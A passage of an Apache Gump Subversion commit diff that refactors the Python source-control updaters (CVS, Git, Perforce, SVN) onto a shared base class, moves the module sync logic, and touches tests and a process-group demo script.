repository = module.repository + root = module.getScm().getCvsRoot() + + # Provide CVS logins, if not already there + loginToRepositoryOnDemand(repository, root, self.logins) - # do a cvs checkout - cmd.addParameter('checkout') - cmd.addParameter('-P') - if tag: - cmd.addParameter('-r',tag,' ') - - if not module.cvs.hasModule() or \ - not module.cvs.getModule() == module.getName(): - cmd.addParameter('-d',module.getName(),' ') - - if module.cvs.hasModule(): - cmd.addParameter(module.cvs.getModule()) - else: - cmd.addParameter(module.getName()) - - return (module.repository, root, cmd) - Copied: gump/live/python/gump/core/update/git.py (from r741429, gump/trunk/python/gump/core/update/git.py) URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/update/git.py?p2=gump/live/python/gump/core/update/git.py&p1=gump/trunk/python/gump/core/update/git.py&r1=741429&r2=745037&rev=745037&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/git.py (original) +++ gump/live/python/gump/core/update/git.py Tue Feb 17 13:10:13 2009 @@ -16,191 +16,52 @@ # See the License for the specific language governing permissions and # limitations under the License. -""" - -""" - -import os.path -import sys -from fnmatch import fnmatch - from gump import log -from gump.core.run.gumprun import * -from gump.core.config import dir, default, basicConfig +from gump.core.model.workspace import Cmd +from gump.core.update.scmupdater import ScmUpdater -from gump.util import dump, display, getIndent, logResourceUtilization, \ - invokeGarbageCollection -from gump.util.note import Annotatable -from gump.util.work import * - -from gump.util.tools import * - -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.project import Project -from gump.core.model.depend import ProjectDependency -from gump.core.model.stats import * -from gump.core.model.state import * +def log_repository_and_url(module): + repository = module.repository + url = module.getScm().getRootUrl() + log.debug("GIT URL: [" + url + "] on Repository: " + \ + repository.getName()) + ############################################################################### # Classes ############################################################################### -class GitUpdater(RunSpecific): +class GitUpdater(ScmUpdater): + """ + Updater for GIT + """ - def __init__(self,run): - RunSpecific.__init__(self,run) + def __init__(self, run): + ScmUpdater.__init__(self, run) - def updateModule(self,module): - """ - Perform a GIT update on a module - """ - - log.info('Perform GIT Update on #[' + `module.getPosition()` + \ - '] : ' + module.getName()) - - # Did we 'GIT checkout' already? - exists = os.path.exists(module.getSourceControlStagingDirectory()) - - self.performUpdate(module, exists) - - return module.okToPerformWork() - - def performStatus(self,module): + def getCheckoutCommand(self, module): """ - - Do a status comparison between our copy and server - + Build the appropriate GIT command for clone """ - - # need to look up how to do that with git + log_repository_and_url(module) + cmd = Cmd('git-clone', 'update_' + module.getName(), + module.getWorkspace().getSourceControlStagingDirectory()) + self.maybeMakeQuiet(module, cmd) + cmd.addParameter(module.getScm().getRootUrl()) + cmd.addParameter(module.getName()) + return cmd - def getStatusCommand(self,module): + def getUpdateCommand(self, module): """ - - Build the 'git status --show-updates --non-interative' command - + Build the appropriate GIT command for pull """ - - # need to look up how to do that with git, this is certainly wrong - - log.debug("Git Module Status : " + module.getName() + \ - ", Repository Name: " + str(module.repository.getName())) - - url=module.git.getRootUrl() - - log.debug("GIT URL: [" + url + "] on Repository: " + module.repository.getName()) - - # - # Prepare GIT checkout/update command... - # - cmd=Cmd('git', 'status_'+module.getName(), - module.getSourceControlStagingDirectory()) - - # - # Be 'quiet' (but not silent) unless requested otherwise. - # - if not module.isDebug() \ - and not module.isVerbose() \ - and not module.git.isDebug() \ - and not module.git.isVerbose(): - cmd.addParameter('--quiet') - - # - # Allow trace for debug - # - # if module.isDebug() or module.git.isDebug(): - # cmd.addParameter('--verbose') - - # do an GIT status - cmd.addParameter('status') - + log_repository_and_url(module) + cmd = Cmd('git-pull', 'update_' + module.getName(), + module.getSourceControlStagingDirectory()) + self.maybeMakeQuiet(module, cmd) return cmd - - def performUpdate(self,module,exists): - """ - - Clone or Pull from GIT - - """ - - # Get the Update Command - (repository, url, cmd ) = self.getUpdateCommand(module, exists) - - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - repository.performedWork(work.clone()) - - # Update Context w/ Results - if not cmdResult.isOk(): - log.error('Failed to clone/pull module: ' + module.name) - module.changeState(STATE_FAILED,REASON_UPDATE_FAILED) - else: - module.changeState(STATE_SUCCESS) - - - def preview(self,module): - (repository, url, command ) = self.getUpdateCommand(module,0) - command.dump() - - (repository, url, command ) = self.getUpdateCommand(module,1) - command.dump() - - def getUpdateCommand(self,module,exists=0): - """ - Build the appropriate GIT command for clone/pull - """ - repository=module.repository - - log.debug("Git Module Update : " + module.getName() + \ - ", Repository Name: " + repository.getName()) - - url=module.git.getRootUrl() - - log.debug("GIT URL: [" + url + "] on Repository: " + repository.getName()) - - # - # Prepare GIT clone/pull command... - # - - if exists: - # do a GIT pull inside working copy - cmd=Cmd('git-pull', 'update_'+module.getName(), - module.getSourceControlStagingDirectory()) - else: - # do a GIT clone - cmd=Cmd('git-clone', 'update_'+module.getName(), - module.getWorkspace().getSourceControlStagingDirectory()) - - # - # Be 'quiet' (but not silent) unless requested otherwise. - # - if not module.isDebug() \ - and not module.isVerbose() \ - and not module.git.isDebug() \ - and not module.git.isVerbose(): + def maybeMakeQuiet(self, module, cmd): + if self.shouldBeQuiet(module): cmd.addParameter('--quiet') - - # - # Allow trace for debug - # - # if module.isDebug() or module.git.isDebug(): - # cmd.addParameter('--verbose') - - if not exists: - # do an GIT pull - cmd.addParameter(url) - cmd.addParameter(module.getName()) - - return (module.repository, url, cmd) - - Modified: gump/live/python/gump/core/update/p4.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/update/p4.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/core/update/p4.py (original) +++ gump/live/python/gump/core/update/p4.py Tue Feb 17 13:10:13 2009 @@ -15,195 +15,58 @@ # See the License for the specific language governing permissions and # limitations under the License. -""" -""" +from gump.core.model.workspace import Cmd +from gump.core.update.scmupdater import ScmUpdater -import os.path -import sys -from fnmatch import fnmatch - -from gump import log -from gump.core.run.gumprun import * -from gump.core.config import dir, default, basicConfig - -from gump.util import dump, display, getIndent, logResourceUtilization, \ - invokeGarbageCollection -from gump.util.note import Annotatable -from gump.util.work import * - -from gump.util.tools import * - -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.project import Project -from gump.core.model.depend import ProjectDependency -from gump.core.model.stats import * -from gump.core.model.state import * +def getP4Command(module): + """ + Update this module (checking out if needed) + """ + cmd = Cmd('p4', 'update_' + module.getName(), + module.getWorkspace().getSourceControlStagingDirectory()) + + # Determine if a tag is set, on <p4 or on <module + tag = None + if module.getScm().hasTag(): + tag = module.getScm().getTag() + elif module.hasTag(): + tag = module.getTag() + + # Do a p4 sync + cmd.addParameter('-p', module.getScm().getPort()) + cmd.addParameter('-u', module.getScm().getUser()) + cmd.addParameter('-P', module.getScm().getPassword()) + cmd.addParameter('-c', module.getScm().getClientspec()) + cmd.addParameter('sync') + if tag: + cmd.addParameter(module.getName() + '/...@', tag, ' ') + else: + cmd.addParameter(module.getName() + '/...') + return cmd ############################################################################### # Classes ############################################################################### -class P4Updater(RunSpecific): +class P4Updater(ScmUpdater): + """ + Updater for Perforce + """ - def __init__(self,run): - RunSpecific.__init__(self,run) - - # - # A stash of known logins. - # - #self.logins=readLogins() + def __init__(self, run): + ScmUpdater.__init__(self, run) - def updateModule(self,module): + def getCheckoutCommand(self, module): """ - - Perform a P4 sync on a module - + Checkout this module """ - - #log.info('Perform P4 Sync on #[' + `module.getPosition()` + \ - # '] : ' + module.getName()) - - ## Did we 'P4 checkout' already? - exists = os.path.exists(module.getSourceControlStagingDirectory()) - - # Doesn't tell us much... - if exists: - self.performStatus(module) - - self.performUpdate(module,exists) - - return module.okToPerformWork() - - def performStatus(self,module): - # Get the Update Command - (repository, root, cmd ) = self.getUpdateCommand(module, True, True) - - ## Provide P4 logins, if not already there - #loginToRepositoryOnDemand(repository,root,self.logins) - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - - if not cmdResult.isOk(): - log.error('Failed to checkout/update module: ' + module.name) - - def performUpdate(self,module,exists): - """ - Update this module (checking out if needed) + return getP4Command(module) + + def getUpdateCommand(self, module): """ - # Get the Update Command - (repository, root, cmd ) = self.getUpdateCommand(module, exists) - - #log.debug("P4 Sync Module " + module.getName() + \ - # ", Repository Name: " + str(module.repository.getName())) - - ## Provide P4 logins, if not already there - #loginToRepositoryOnDemand(repository,root,self.logins) - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - repository.performedWork(work.clone()) - - # Update Context w/ Results - if not cmdResult.isOk(): - log.error('Failed w/ P4 Root ' + root + ' for %s on Repository %s.' \ - % (module.name, module.repository.getName())) - if not exists: - module.changeState(STATE_FAILED,REASON_UPDATE_FAILED) - else: - module.addError('*** Failed to update from source control. Stale contents ***') - - # Black mark for this repository - repository=module.getRepository() - repository.addError('*** Failed to update %s from source control. Stale contents ***' \ - % module.getName()) - - # Kinda bogus, but better than nowt (for now) - module.changeState(STATE_SUCCESS,REASON_UPDATE_FAILED) - else: - module.changeState(STATE_SUCCESS) - - # We run P4 so any output means updates occured... - if cmdResult.hasOutput(): - log.info('Update(s) received via P4 on #[' \ - + `module.getPosition()` + \ - '] : ' + module.getName()) - - def preview(self,module): - - (repository, root, command ) = self.getUpdateCommand(module,False) - command.dump() - - # Doesn't tell us much... - #(repository, root, command ) = self.getUpdateCommand(module,True,True) - #command.dump() - - (repository, root, command ) = self.getUpdateCommand(module,True) - command.dump() - - - def getUpdateCommand(self,module,exists=False,nowork=False): - """ - Format a commandline for doing the P4 update + Update this module """ - if nowork and not exists: - raise RuntimeException('Not coded for this combo.') - - root=module.p4.getClientspec() - # Prepare P4 sync command... - prefix='update' - directory=module.getWorkspace().getSourceControlStagingDirectory() - #if exists: - # directory=module.getSourceControlStagingDirectory() - if nowork: - prefix='status' - - cmd=Cmd( 'p4', - prefix+'_'+module.getName(), - directory) - - ## Allow trace for debug - #if module.isDebug(): - # cmd.addParameter('-t') - - ## Request compression - #cmd.addParameter('-z3') - - # Determine if a tag is set, on <p4 or on <module - tag=None - if module.p4.hasTag(): - tag=module.p4.getTag() - elif module.hasTag(): - tag=module.getTag() - - # Do a p4 sync - cmd.addParameter('-p',module.p4.getPort()) - cmd.addParameter('-u',module.p4.getUser()) - cmd.addParameter('-P',module.p4.getPassword()) - cmd.addParameter('-c',root) - cmd.addParameter('sync') - if nowork: - cmd.addParameter('-n') - if tag: - cmd.addParameter(module.getName()+'/...@',tag,' ') - else: - cmd.addParameter(module.getName()+'/...') - #cmd.addParameter(module.getName()) + return getP4Command(module) - return (module.repository, root, cmd) - Copied: gump/live/python/gump/core/update/scmupdater.py (from r744794, gump/trunk/python/gump/core/update/scmupdater.py) URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/update/scmupdater.py?p2=gump/live/python/gump/core/update/scmupdater.py&p1=gump/trunk/python/gump/core/update/scmupdater.py&r1=744794&r2=745037&rev=745037&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/scmupdater.py (original) +++ gump/live/python/gump/core/update/scmupdater.py Tue Feb 17 13:10:13 2009 @@ -17,16 +17,12 @@ # limitations under the License. import os.path -import sys from gump import log -from gump.core.run.gumprun import * -from gump.util.note import Annotatable -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.stats import * -from gump.core.model.state import * +from gump.core.model.workspace import CommandWorkItem, execute, \ + REASON_UPDATE_FAILED, STATE_FAILED, STATE_SUCCESS, WORK_TYPE_UPDATE +from gump.core.run.gumprun import RunSpecific ############################################################################### # Classes @@ -38,7 +34,7 @@ Provides helpers and template method implementations. """ - def __init__(self,run): + def __init__(self, run): RunSpecific.__init__(self, run) # @@ -69,12 +65,13 @@ if cmd: if isUpdate: - log.debug(module.getScm().getScmName() + " Module Update : " +\ + log.debug(module.getScm().getScmName() + " Module Update : " + \ module.getName() + ", Repository Name: " + \ module.repository.getName()) else: - log.debug(module.getScm().getScmName() + " Module Checkout : " +\ - module.getName() + ", Repository Name: " + \ + log.debug(module.getScm().getScmName() + \ + " Module Checkout : " + module.getName() + \ + ", Repository Name: " + \ module.repository.getName()) # Execute the command and capture results @@ -88,13 +85,35 @@ # Update Context w/ Results if not cmdResult.isOk(): log.error('Failed to checkout/update module: ' + module.name) - module.changeState(STATE_FAILED, REASON_UPDATE_FAILED) + + # + # Here the live branch differs from trunk: while live + # will mark the module as failed (and not build any + # projects contained in it), live will go on if the + # directory exists and assume it is a transient error + # + if not isUpdate: + module.changeState(STATE_FAILED, REASON_UPDATE_FAILED) + else: + module.addError('*** Failed to update from source control.' \ + + 'Stale contents ***') + + # Black mark for this repository + repository = module.getRepository() + repository.addError('*** Failed to update %s from source' + \ + ' control. Stale contents ***' \ + % module.getName()) + + # Kinda bogus, but better than nowt (for now) + module.changeState(STATE_SUCCESS, REASON_UPDATE_FAILED) + else: module.changeState(STATE_SUCCESS) return module.okToPerformWork() - log.error("Don't know how to to checkout/update module: " + module.name) + log.error("Don't know how to to checkout/update module: " + \ + module.name) module.changeState(STATE_FAILED, REASON_UPDATE_FAILED) return False Modified: gump/live/python/gump/core/update/svn.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/update/svn.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/core/update/svn.py (original) +++ gump/live/python/gump/core/update/svn.py Tue Feb 17 13:10:13 2009 @@ -16,224 +16,60 @@ # See the License for the specific language governing permissions and # limitations under the License. -""" - -""" - -import os.path -import sys -from fnmatch import fnmatch - from gump import log -from gump.core.run.gumprun import * -from gump.core.config import dir, default, basicConfig - -from gump.util import dump, display, getIndent, logResourceUtilization, \ - invokeGarbageCollection -from gump.util.note import Annotatable -from gump.util.work import * - -from gump.util.tools import * - -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.project import Project -from gump.core.model.depend import ProjectDependency -from gump.core.model.stats import * -from gump.core.model.state import * +from gump.core.model.workspace import Cmd +from gump.core.update.scmupdater import ScmUpdater ############################################################################### # Classes ############################################################################### -class SvnUpdater(RunSpecific): +class SvnUpdater(ScmUpdater): + """ + Updater for Subversion + """ - def __init__(self,run): - RunSpecific.__init__(self,run) + def __init__(self, run): + ScmUpdater.__init__(self, run) - def updateModule(self,module): - """ - Perform a SVN update on a module + def getCheckoutCommand(self, module): """ - - log.info('Perform SVN Update on #[' + `module.getPosition()` + \ - '] : ' + module.getName()) - - # Did we 'SVN checkout' already? - exists = os.path.exists(module.getSourceControlStagingDirectory()) - - # Doesn't teach us much - #if exists: - # self.performStatus(module) - - self.performUpdate(module, exists) - - return module.okToPerformWork() - - def performStatus(self,module): - """ - - Do a status comparison between our copy and server - + Build the appropriate SVN command for checkout """ - - # Get the Update Command - cmd = self.getStatusCommand(module) - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # Store this as work - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - - # Update Context w/ Results - if not cmdResult.isOk(): - message='Failed to \'status --show-updates\' module: ' + module.getName() - module.addWarning(message) - log.error(message) + return self.getCommand(module, False) - def getStatusCommand(self,module): + def getUpdateCommand(self, module): """ - - Build the 'svn status --show-updates --non-interative' command - + Build the appropriate SVN command for update """ - log.debug("SubVersion Module Status : " + module.getName() + \ - ", Repository Name: " + str(module.repository.getName())) - - url=module.svn.getRootUrl() - - log.debug("SVN URL: [" + url + "] on Repository: " + module.repository.getName()) - - # - # Prepare SVN checkout/update command... - # - cmd=Cmd('svn', 'status_'+module.getName(), - module.getSourceControlStagingDirectory()) - - # - # Be 'quiet' (but not silent) unless requested otherwise. - # - if not module.isDebug() \ - and not module.isVerbose() \ - and not module.svn.isDebug() \ - and not module.svn.isVerbose(): - cmd.addParameter('--quiet') - - # - # Allow trace for debug - # - # SVN complains about -v|--verbose, don't ask me why - # - # if module.isDebug() or module.svn.isDebug(): - # cmd.addParameter('--verbose') - - # do an SVN status --show-updates - cmd.addParameter('status') - cmd.addParameter('--show-updates') - - # - # Request non-interactive - # - cmd.addParameter('--non-interactive') + return self.getCommand(module, True) - return cmd - - - def performUpdate(self,module,exists): + def getCommand(self, module, forUpdate): """ - - Check-out or Update from SVN - + Build the appropriate SVN command for checkout or update """ - - # Get the Update Command - (repository, url, cmd ) = self.getUpdateCommand(module, exists) - - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) + repository = module.repository + url = module.getScm().getRootUrl() - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - repository.performedWork(work.clone()) - - # Update Context w/ Results - if not cmdResult.isOk(): - log.error('Failed to checkout/update module: ' + module.name) - if not exists: - module.changeState(STATE_FAILED,REASON_UPDATE_FAILED) - else: - module.addError('*** Failed to update from source control. Stale contents ***') - - # Black mark for this repository - repository=module.getRepository() - repository.addError('*** Failed to update %s from source control. Stale contents ***' \ - % module.getName()) - - # Kinda bogus, but better than nowt (for now) - module.changeState(STATE_SUCCESS,REASON_UPDATE_FAILED) - else: - module.changeState(STATE_SUCCESS) - - - def preview(self,module): - (repository, url, command ) = self.getUpdateCommand(module,0) - command.dump() - - # Doesn't teach us much - # command = self.getStatusCommand(module) - # command.dump() - - (repository, url, command ) = self.getUpdateCommand(module,1) - command.dump() - - def getUpdateCommand(self,module,exists=0): - """ - Build the appropriate SVN command for checkout/update - """ - repository=module.repository - - log.debug("SubVersion Module Update : " + module.getName() + \ - ", Repository Name: " + repository.getName()) - - url=module.svn.getRootUrl() - - log.debug("SVN URL: [" + url + "] on Repository: " + repository.getName()) + log.debug("SVN URL: [" + url + "] on Repository: "\ + + repository.getName()) # # Prepare SVN checkout/update command... # - cmd=Cmd('svn', 'update_'+module.getName(), - module.getWorkspace().getSourceControlStagingDirectory()) + cmd = Cmd('svn', 'update_'+module.getName(), + module.getWorkspace().getSourceControlStagingDirectory()) # # Be 'quiet' (but not silent) unless requested otherwise. # - if not module.isDebug() \ - and not module.isVerbose() \ - and not module.svn.isDebug() \ - and not module.svn.isVerbose(): + if self.shouldBeQuiet(module): cmd.addParameter('--quiet') - # - # Allow trace for debug - # - # SVN complains about -v|--verbose, don't ask me why - # - # if module.isDebug() or module.svn.isDebug(): - # cmd.addParameter('--verbose') - - if exists: - # do an SVN update + if forUpdate: cmd.addParameter('update') else: - # do an SVN checkout cmd.addParameter('checkout', url) # @@ -251,10 +87,8 @@ # If module name != SVN directory, tell SVN to put it into # a directory named after our module # - if not module.svn.hasDir() or \ - not module.svn.getDir() == module.getName(): + if not module.getScm().hasDir() or \ + not module.getScm().getDir() == module.getName(): cmd.addParameter(module.getName()) - return (module.repository, url, cmd) - - + return cmd Modified: gump/live/python/gump/core/update/updater.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/update/updater.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/core/update/updater.py (original) +++ gump/live/python/gump/core/update/updater.py Tue Feb 17 13:10:13 2009 @@ -21,31 +21,70 @@ """ import os.path -import sys from gump import log - -from gump.core.run.gumprun import * -from gump.core.config import dir, default, basicConfig - +from gump.core.model.workspace import catFileToFileHolder, \ + EXIT_CODE_FAILED, EXIT_CODE_SUCCESS, FILE_TYPE_LOG, \ + gumpSafeName, logResourceUtilization, \ + STATE_FAILED, STATE_SUCCESS, syncDirectories, REASON_SYNC_FAILED +from gump.core.run.gumprun import RunSpecific from gump.core.update.cvs import CvsUpdater -from gump.core.update.svn import SvnUpdater +from gump.core.update.git import GitUpdater from gump.core.update.p4 import P4Updater +from gump.core.update.svn import SvnUpdater + +def syncModule(module): + """ + + Synchronize the storage area with the build area + + """ + workspace = module.getWorkspace() + + sourcedir = module.getSourceControlStagingDirectory() + destdir = module.getWorkingDirectory() + + # Perform the sync... + try: + # Store changes next to updates log + changesFile = os.path.abspath(os.path.join(workspace.tmpdir, + 'changes_to_' + \ + gumpSafeName(module.getName()) + \ + '.txt')) + + # Perform the operation. + (actions, modified, cleaned) = syncDirectories(sourcedir, destdir, \ + module, \ + changesFile) -from gump.util import dump, display, getIndent, logResourceUtilization, \ - invokeGarbageCollection -from gump.util.note import Annotatable -from gump.util.work import * - -from gump.util.tools import * - -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.project import Project -from gump.core.model.depend import ProjectDependency -from gump.core.model.stats import * -from gump.core.model.state import * + # We are good to go... + module.changeState(STATE_SUCCESS) + + # Were the contents of the repository modified? + if modified: + + # + # Use 'incoming changes' to note that the module + # was modified. + # + module.setModified(True) + log.info('Update(s) received via on #[' \ + + `module.getPosition()` + \ + '] : ' + module.getName()) + + + except Exception, details: + module.changeState(STATE_FAILED, REASON_SYNC_FAILED) + message = 'Synchronize Failed: ' + str(details) + module.addError(message) + log.error(message, exc_info=1) + + + # Might help even with sync failures. + if os.path.exists(changesFile): + catFileToFileHolder(module, changesFile, FILE_TYPE_LOG) + return module.okToPerformWork() ############################################################################### # Classes @@ -53,34 +92,30 @@ class GumpUpdater(RunSpecific): - def __init__(self,run): + def __init__(self, run): RunSpecific.__init__(self, run) - self.cvs=CvsUpdater(run) - self.svn=SvnUpdater(run) - self.p4=P4Updater(run) + self.updaters = {'cvs' : CvsUpdater(run), 'svn' : SvnUpdater(run), + 'p4' : P4Updater(run), 'git' : GitUpdater(run)} - """ - - ****************************************************************** - - THE UPDATE INTERFACE - - ****************************************************************** - - """ + + # ****************************************************************** + # + # THE UPDATE INTERFACE + # + # ****************************************************************** def update(self): logResourceUtilization('Before update') # # Doing a full build? # - all=not self.run.getOptions().isQuick() + all = not self.run.getOptions().isQuick() if all: - modules=self.run.getGumpSet().getModuleSequence() + modules = self.run.getGumpSet().getModuleSequence() else: - modules=self.run.getGumpSet().getModules() + modules = self.run.getGumpSet().getModules() # # Checkout from source code repositories @@ -100,13 +135,14 @@ workspace = self.run.getWorkspace() - log.debug("Workspace CVS|SVN|P4 Directory: " + workspace.getSourceControlStagingDirectory()) + log.debug("Workspace CVS|SVN|P4|GIT Directory: " \ + + workspace.getSourceControlStagingDirectory()) - # Update all the modules that have CVS repositories + # Update all the modules that have repositories for module in list: self.updateModule(module) - def updateModule(self,module): + def updateModule(self, module): # if module.isPackaged(): # # Not sure we have anything to do right now @@ -122,85 +158,36 @@ if module.okToPerformWork(): ok = 0 - if module.hasCvs(): - ok=self.cvs.updateModule(module) - elif module.hasSvn(): - ok=self.svn.updateModule(module) - if module.hasP4(): - ok=self.p4.updateModule(module) + scmUpdater = self.getScmUpdater(module) + if scmUpdater: + ok = scmUpdater.updateModule(module) else: # :TODO: Now what? pass # Synchronize the files... if ok: - self.syncModule(module) + syncModule(module) - def syncModule(self,module): + def getScmUpdater(self, module): """ - - Synchronize the storage area with the build area - + Finds the correct SCM updater for a given module """ - workspace = module.getWorkspace() - - sourcedir = module.getSourceControlStagingDirectory() - destdir = module.getWorkingDirectory() - - # Perform the sync... - try: - # Store changes next to updates log - changesFile = os.path.abspath( \ - os.path.join( \ - workspace.tmpdir, \ - 'changes_to_'+gumpSafeName(module.getName())+'.txt')) - - # Perform the operation. - (actions,modified,cleaned)=syncDirectories(sourcedir,destdir,module,changesFile) - - # We are good to go... - module.changeState(STATE_SUCCESS) - - # Were the contents of the repository modified? - if modified: - - # - # Use 'incoming changes' to note that the module - # was modified. - # - module.setModified(True) - log.info('Update(s) received via on #[' \ - + `module.getPosition()` + \ - '] : ' + module.getName()) - - - except Exception, details: - module.changeState(STATE_FAILED,REASON_SYNC_FAILED) - message='Synchronize Failed: ' + str(details) - module.addError(message) - log.error(message, exc_info=1) - - - # Might help even with sync failures. - if os.path.exists(changesFile): - catFileToFileHolder(module, changesFile, FILE_TYPE_LOG) - - return module.okToPerformWork() - + scm = module.getScm() + if scm: + return self.updaters.get(scm.getScmType()) + return None - def preview(self,module): + def preview(self, module): """ Preview what ought occur for this """ - if module.hasCvs(): - ok=self.cvs.preview(module) - elif module.hasSvn(): - ok=self.svn.preview(module) - elif module.hasP4(): - ok=self.p4.preview(module) + scmUpdater = self.getScmUpdater(module) + if scmUpdater: + scmUpdater.preview(module) else: print 'No updater for module: ' + module.getName() Modified: gump/live/python/gump/test/model.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/test/model.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/test/model.py (original) +++ gump/live/python/gump/test/model.py Tue Feb 17 13:10:13 2009 @@ -166,8 +166,8 @@ module1=self.module1 module2=self.module2 - self.assertTrue('Module has CVS', module1.hasCvs()) - self.assertFalse('Module has NOT SVN', module1.hasSvn()) + self.assertTrue('Module has CVS', + module1.getScm().getScmType() == 'cvs') self.assertNonZeroString('CVSROOT',module1.cvs.getCvsRoot()) self.assertNonZeroString('Has Tag',module1.cvs.getTag()) self.assertNonZeroString('Has Tag',module2.getTag()) @@ -175,8 +175,8 @@ def testSvn(self): svnmodule1= self.workspace.getModule('svn_module1') - self.assertTrue('Module has SVN', svnmodule1.hasSvn()) - self.assertFalse('Module has NOT CVS', svnmodule1.hasCvs()) + self.assertTrue('Module has SVN', + module1.getScm().getScmType() == 'svn') self.assertNonZeroString('SVN URL',svnmodule1.svn.getRootUrl()) self.assertTrue('SVN Dir',svnmodule1.svn.hasDir()) Modified: gump/live/python/gump/test/testExample.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/test/testExample.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/test/testExample.py (original) +++ gump/live/python/gump/test/testExample.py Tue Feb 17 13:10:13 2009 @@ -51,4 +51,4 @@ # this allows us to run this test by itself from the commandline if __name__ == '__main__': - unittest.main() \ No newline at end of file + unittest.main() Modified: gump/live/python/gump/util/sync.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/util/sync.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/gump/util/sync.py (original) +++ gump/live/python/gump/util/sync.py Tue Feb 17 13:10:13 2009 @@ -198,8 +198,8 @@ linkto = os.readlink(srcname) os.symlink(linkto, dstname) elif os.path.isdir(srcname): - # Copy directories, but not CVS/SVN stuff - if not name in ['CVS','.svn']: + # Copy directories, but not CVS/SVN/GIT stuff + if not name in ['CVS','.svn','.git']: self.copytree(srcname, dstname, symlinks) else: # Selectively copy file Modified: gump/live/python/misc/pgrp.py URL: http://svn.apache.org/viewvc/gump/live/python/misc/pgrp.py?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/python/misc/pgrp.py (original) +++ gump/live/python/misc/pgrp.py Tue Feb 17 13:10:13 2009 @@ -1,69 +1,69 @@ - -import os -import sys -import time -import logging -import signal - -def shutdownProcessAndProcessGroup(pid): - """ - Kill this group (i.e. instigator and all child processes). - """ - print 'Kill process group (anything launched by PID' + str(pid) + ')' - try: - pgrpID=os.getpgid(pid) - if -1 != pgrpID: - print 'Kill process group : (' + str(pgrpID) + ')' - os.killpg(pgrpID,signal.SIGHUP) - else: - print 'No such PID' + str(pid) + '.' - except Exception, details: - print 'Failed to dispatch signal ' + str(details) - -def hup(sig,stack): - print "HUP : %s:%s" % ( os.getpgrp(), os.getpid() ) - sys.exit(1) - -if __name__=='__main__': - forkPID = os.fork(); - - # Child gets PID = 0 - if 0 == forkPID: - - # Become a process group leader - os.setpgrp() - - signal.signal( signal.SIGHUP, hup ) - - # First Grandchild get's 0 - forkPID = os.fork() - - if 0 == forkPID: - os.fork() - os.fork() - os.fork() - os.system('sleep 100000') - else: - os.waitpid(forkPID,0) - - print 'Child Exit : %s' % os.getpid() - - # Parent gets real PID - else: - # Timeout support - timer = None - timeout = 10 - if timeout: - import threading - timer = threading.Timer(timeout, shutdownProcessAndProcessGroup, [forkPID]) - timer.start() - - # Run the command - waitcode = os.waitpid(forkPID,0) - - print 'Wait Code : %s : %s ' % ( waitcode, timer ) - - # Stop timer (if still running) - if timer and timer.isAlive(): timer.cancel() - + +import os +import sys +import time +import logging +import signal + +def shutdownProcessAndProcessGroup(pid): + """ + Kill this group (i.e. instigator and all child processes). + """ + print 'Kill process group (anything launched by PID' + str(pid) + ')' + try: + pgrpID=os.getpgid(pid) + if -1 != pgrpID: + print 'Kill process group : (' + str(pgrpID) + ')' + os.killpg(pgrpID,signal.SIGHUP) + else: + print 'No such PID' + str(pid) + '.' + except Exception, details: + print 'Failed to dispatch signal ' + str(details) + +def hup(sig,stack): + print "HUP : %s:%s" % ( os.getpgrp(), os.getpid() ) + sys.exit(1) + +if __name__=='__main__': + forkPID = os.fork(); + + # Child gets PID = 0 + if 0 == forkPID: + + # Become a process group leader + os.setpgrp() + + signal.signal( signal.SIGHUP, hup ) + + # First Grandchild get's 0 + forkPID = os.fork() + + if 0 == forkPID: + os.fork() + os.fork() + os.fork() + os.system('sleep 100000') + else: + os.waitpid(forkPID,0) + + print 'Child Exit : %s' % os.getpid() + + # Parent gets real PID + else: + # Timeout support + timer = None + timeout = 10 + if timeout: + import threading + timer = threading.Timer(timeout, shutdownProcessAndProcessGroup, [forkPID]) + timer.start() + + # Run the command + waitcode = os.waitpid(forkPID,0) + + print 'Wait Code : %s : %s ' % ( waitcode, timer ) + + # Stop timer (if still running) + if timer and timer.isAlive(): timer.cancel() + print 'Exit : %s:%s' % ( os.getpgrp(), os.getpid() ) \ No newline at end of file Propchange: gump/live/python/misc/pgrp.py ------------------------------------------------------------------------------ 